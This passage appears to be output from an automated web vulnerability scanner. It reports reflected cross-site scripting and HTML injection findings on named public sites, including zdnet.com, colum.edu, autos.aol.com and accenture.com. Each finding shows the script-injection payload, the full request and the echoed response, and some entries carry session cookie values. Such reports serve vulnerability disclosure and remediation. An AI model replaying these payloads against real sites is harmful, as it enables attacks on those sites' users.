Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22618%22%2C%22longittude%22%3A%22-95.363%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22houston%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2218%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2229.763%22%7D; expires=Mon, 21-Nov-2011 21:36:45 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=995
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 96969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<script type="text/javascript">
(function() {
var toolbar = new CNB.Toolbar('toolbar-192487', {
'cid': '192487',
'serviceCid': 'desktop_4283d10a9';df7c136c81d',
'title': 'Micro Center beats Intel&#039;s deal, offers its 64GB SSD for just $99.99',
'summary': 'Intel has slashed prices on its mainstream solid state drives, but Micro Center has
...[SNIP]...

1.1395. http://www.zdnet.com/blog/microsoft/rss [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zdnet.com
Path:   /blog/microsoft/rss

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2730"><script>alert(1)</script>a93be0ef7e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/microsoft/rssf2730"><script>alert(1)</script>a93be0ef7e9?tag=mantle_skin;content HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:32:55 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22618%22%2C%22longittude%22%3A%22-95.363%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22houston%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2218%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2229.763%22%7D; expires=Mon, 21-Nov-2011 21:32:55 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=996
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 115291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<link rel="canonical" href="http://www.zdnet.com/blog/microsoft/rssf2730"><script>alert(1)</script>a93be0ef7e9" />
...[SNIP]...

1.1396. http://www.zdnet.com/search [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /search

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8efef"><a>e12d9ec9b08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search8efef"><a>e12d9ec9b08?t=1&mode=rss HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 21 Nov 2010 21:32:40 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22618%22%2C%22longittude%22%3A%22-95.363%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22houston%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2218%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2229.763%22%7D; expires=Mon, 21-Nov-2011 21:32:40 GMT; path=/; domain=.zdnet.com
Status: 404 Not Found
Keep-Alive: timeout=15, max=994
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 41330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<link rel="canonical" href="http://www.zdnet.com/search8efef"><a>e12d9ec9b08?t=1&mode=rss" />
...[SNIP]...

1.1397. http://www2.colum.edu/course_descriptions/52-3804.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.colum.edu
Path:   /course_descriptions/52-3804.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6efa8<script>alert(1)</script>49c3ec12972 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /course_descriptions6efa8<script>alert(1)</script>49c3ec12972/52-3804.html HTTP/1.1
Host: www2.colum.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 21 Nov 2010 21:35:44 GMT
Server: Apache/1.3.41 (Darwin) PHP/5.1.6 DAV/1.0.3 mod_ssl/2.8.31 OpenSSL/0.9.7l
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 15912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>

<head>
<meta http-equiv="content-type" content="text/html; char
...[SNIP]...
<p>The requested URI http://www2.colum.edu/course_descriptions6efa8<script>alert(1)</script>49c3ec12972/52-3804.html
was not found. The page you are looking for might have been removed, had its
name changed, or is temporarily unavailable.</p>
...[SNIP]...

1.1398. http://www2.colum.edu/course_descriptions/52-3804.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.colum.edu
Path:   /course_descriptions/52-3804.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5d02'-alert(1)-'0a403166bf8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /course_descriptionse5d02'-alert(1)-'0a403166bf8/52-3804.html HTTP/1.1
Host: www2.colum.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 21 Nov 2010 21:35:43 GMT
Server: Apache/1.3.41 (Darwin) PHP/5.1.6 DAV/1.0.3 mod_ssl/2.8.31 OpenSSL/0.9.7l
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 15873


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>

<head>
<meta http-equiv="content-type" content="text/html; char
...[SNIP]...
try{

       var pageTracker = _gat._getTracker("UA-534393-20");

       pageTracker._setDomainName(".colum.edu");

       
       pageTracker._trackPageview('/Error.php?page=http://www2.colum.edu/course_descriptionse5d02'-alert(1)-'0a403166bf8/52-3804.html&ref=');
       

       } catch(err) {}

       </script>
...[SNIP]...

1.1399. http://www2.colum.edu/course_descriptions/52-3804.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.colum.edu
Path:   /course_descriptions/52-3804.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload be8ad--><script>alert(1)</script>b8db784d8f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /course_descriptions/be8ad--><script>alert(1)</script>b8db784d8f3 HTTP/1.1
Host: www2.colum.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:35:46 GMT
Server: Apache/1.3.41 (Darwin) PHP/5.1.6 DAV/1.0.3 mod_ssl/2.8.31 OpenSSL/0.9.7l
Cache-Control: max-age=60
Expires: Sun, 21 Nov 2010 21:36:46 GMT
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 15415


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>

<head>
<meta http-equiv="content-type" content="text/html; char
...[SNIP]...
<!-- From http://cccjbar.colum.edu:9040/cgi-bin/public/CCcrsdescr.cgi?crs_no=be8ad--><script>alert(1)</script>b8db784d8f3&cat=UG10 -->
...[SNIP]...

1.1400. http://autos.aol.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://autos.aol.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be569"><script>alert(1)</script>12ac101ed60 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: autos.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=be569"><script>alert(1)</script>12ac101ed60

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:33:08 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Set-Cookie: latLng=029.763%3A-095.363; Expires=Wed, 22-Dec-2010 01:33:09 GMT; Path=/
Set-Cookie: zip=none; Expires=Wed, 22-Dec-2010 01:33:09 GMT; Path=/
Set-Cookie: userIP=174.121.222.18; Expires=Wed, 22-Dec-2010 01:33:09 GMT; Path=/
Keep-Alive: timeout=5, max=79
Connection: Keep-Alive
Content-Length: 56687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
amp;c1=aut+%3A+Autos+Main&amp;c2=aut+%3A+Autos+Main&amp;c3=gmt_5&amp;c12=%2Fused-list%2F&amp;c16=Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29&amp;r=http://www.google.com/search?hl=en&q=be569"><script>alert(1)</script>12ac101ed60&amp;c49=H.20-Oct2009&amp;s=1440x900&amp;c=32&amp;j=1.5&amp;v=Y&amp;k=Y&amp;bw=1419&amp;bh=287&amp;ct=lan&amp;hp=N&amp;AQE=1" alt="" height="1" width="1" />
...[SNIP]...

1.1401. http://newsroom.accenture.com/article_display.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.accenture.com
Path:   /article_display.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6f31"><a>eaabc623be2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /article_display.cfm?article_id=5052 HTTP/1.1
Host: newsroom.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c6f31"><a>eaabc623be2

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Nov 2010 17:16:46 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=26120745;expires=Tue, 13-Nov-2040 17:16:46 GMT;path=/
Set-Cookie: CFTOKEN=83a0d59f35605f6d-6F7017BC-CA1A-89D8-9E406813C79A285D;expires=Tue, 13-Nov-2040 17:16:46 GMT;path=/
Set-Cookie: DARKSITE=0;expires=Sat, 21-Nov-2009 17:16:46 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=c6f31"><a>eaabc623be2">
...[SNIP]...

1.1402. http://www.accenture.com/Accenture/Templates/WidescreenNavigationTemplate.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /Accenture/Templates/WidescreenNavigationTemplate.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 147fc"%3balert(1)//6c83825ff2d was submitted in the Referer HTTP header. This input was echoed as 147fc";alert(1)//6c83825ff2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /Accenture/Templates/WidescreenNavigationTemplate.aspx?NRMODE=Published&NRORIGINALURL=%2fGlobal%2fServices%2fdefault%2ehtm&NRNODEGUID=%7bF910014D-CA05-4928-BC85-355FCC00A4C1%7d&NRCACHEHINT=Guest HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: 147fc"%3balert(1)//6c83825ff2d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.accenture.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Content-Length: 7080

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=dDw0NzA5Nzk1Njk7dDw7bDxpPDM%2BOz47bDx0PDtsPGk8MT47aTw2PjtpPDg%2BO2k8OT47PjtsPHQ8cDxwPGw8U2VhcmNoVGV4dDtWaXNpYmxlOz47bDxcZTtvPHQ%2BOz4%2BOz47bDxpPDA%2BO2k8Mj
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 21 Nov 2010 16:48:34 GMT
Connection: close
Cache-Control: no-cache
Expires: -1
Pragma: cache
Pragma: no-cache
Content-Length: 68903


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>
           Search</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="
...[SNIP]...
<script language="JavaScript" type="text/javascript">
var s_account="accaccenturecom,accglobal"
var currentPage="accenture/search/search.aspx"
var formPageReferrer="accenture/search/147fc";alert(1)//6c83825ff2d"
</script>
...[SNIP]...

1.1403. http://www.accenture.com/accenture/search/search.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /accenture/search/search.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d837b"%3balert(1)//f0fcb94c3c6 was submitted in the Referer HTTP header. This input was echoed as d837b";alert(1)//f0fcb94c3c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accenture/search/search.aspx HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Referer: d837b"%3balert(1)//f0fcb94c3c6

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:48:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:27 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: cache
Pragma: no-cache
Content-Length: 66799


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>
           Search</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="
...[SNIP]...
<script language="JavaScript" type="text/javascript">
var s_account="accaccenturecom,accglobal"
var currentPage="accenture/search/search.aspx"
var formPageReferrer="accenture/search/d837b";alert(1)//f0fcb94c3c6"
</script>
...[SNIP]...

1.1404. https://www.accenture.com/Accenture/Registration/EAN.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.accenture.com
Path:   /Accenture/Registration/EAN.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3528e"%3balert(1)//6b050943d86 was submitted in the Referer HTTP header. This input was echoed as 3528e";alert(1)//6b050943d86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /Accenture/Registration/EAN.aspx HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: 3528e"%3balert(1)//6b050943d86
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.accenture.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: Commerce2002_TestSessionCookie=TestCookie; UrlTracker=ReferrerPageURL=/global/personalization&Content=&ThankYouPageTitle=Confirmation&ReferrerPageTitle=Your Content&ThankYouPageType=&ThankYouPageLinks=; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; Commerce2002_TestPersistentCookie=TestCookie; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F; UserPref=Culture^en-US
Content-Length: 6390

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=dDwtMjAzMTIwNzQ1NTt0PDtsPGk8MT47aTw1Pjs%2BO2w8dDxwPGw8aW5uZXJodG1sOz47bDxFLW1haWwgQWxlcnRzICZhbXBcOyBOZXdzbGV0dGVyczs%2BPjs7Pjt0PDtsPGk8NT47aTw3PjtpPDg%2BO2
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 21 Nov 2010 16:47:05 GMT
Connection: keep-alive
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:47:04 GMT; path=/
Set-Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; path=/
Cache-Control: private
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache
Content-Length: 60496


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title id="pageTitle">E-mail Alerts &amp; Newsletters</title>
       <meta content="Microsoft Visual Studio .NET 7.1" n
...[SNIP]...
<script language="JavaScript" type="text/javascript">
var s_account="accaccenturecom,accglobal"
var currentPage="accenture/registration/ean.aspx"
var formPageReferrer="accenture/registration/3528e";alert(1)//6b050943d86"
</script>
...[SNIP]...

1.1405. https://www.accenture.com/Accenture/Registration/GenericTemplate.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.accenture.com
Path:   /Accenture/Registration/GenericTemplate.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86d19"%3balert(1)//702d592eee6 was submitted in the Referer HTTP header. This input was echoed as 86d19";alert(1)//702d592eee6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Accenture/Registration/GenericTemplate.aspx?NRMODE=Published&NRORIGINALURL=%2fGlobal%2fRegistration%2fMailTo%2ehtm&NRNODEGUID=%7b832928A7-7F09-4627-9CE3-4DDCCF3676AA%7d&NRCACHEHINT=Guest HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Referer: 86d19"%3balert(1)//702d592eee6

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:47:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:47:30 GMT; path=/
Set-Cookie: UrlTracker=ReferrerPageURL=/global/personalization&Content=&ThankYouPageTitle=Confirmation&ReferrerPageTitle=Your Content&ThankYouPageType=&ThankYouPageLinks=; path=/
Set-Cookie: FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache
Content-Length: 46442


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title id="pageTitle">Send us an E-mail</title>
       <META http-equiv="Content-Type" content="text/html; charset=win
...[SNIP]...
<script language="JavaScript" type="text/javascript">
var s_account="accaccenturecom,accglobal"
var currentPage="global/registration/mailto.htm"
var formPageReferrer="accenture/registration/86d19";alert(1)//702d592eee6"
</script>
...[SNIP]...

1.1406. https://www.accenture.com/Accenture/Registration/IMFormTemplate.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.accenture.com
Path:   /Accenture/Registration/IMFormTemplate.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f93bb"%3balert(1)//7c5bd8ef11 was submitted in the Referer HTTP header. This input was echoed as f93bb";alert(1)//7c5bd8ef11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Accenture/Registration/IMFormTemplate.aspx?NRMODE=Published&NRORIGINALURL=%2fGlobal%2fRegistration%2fFeedbackForm%2ehtm&NRNODEGUID=%7b13DF5E01-389F-4013-BC36-296A775C1FE5%7d&NRCACHEHINT=Guest HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
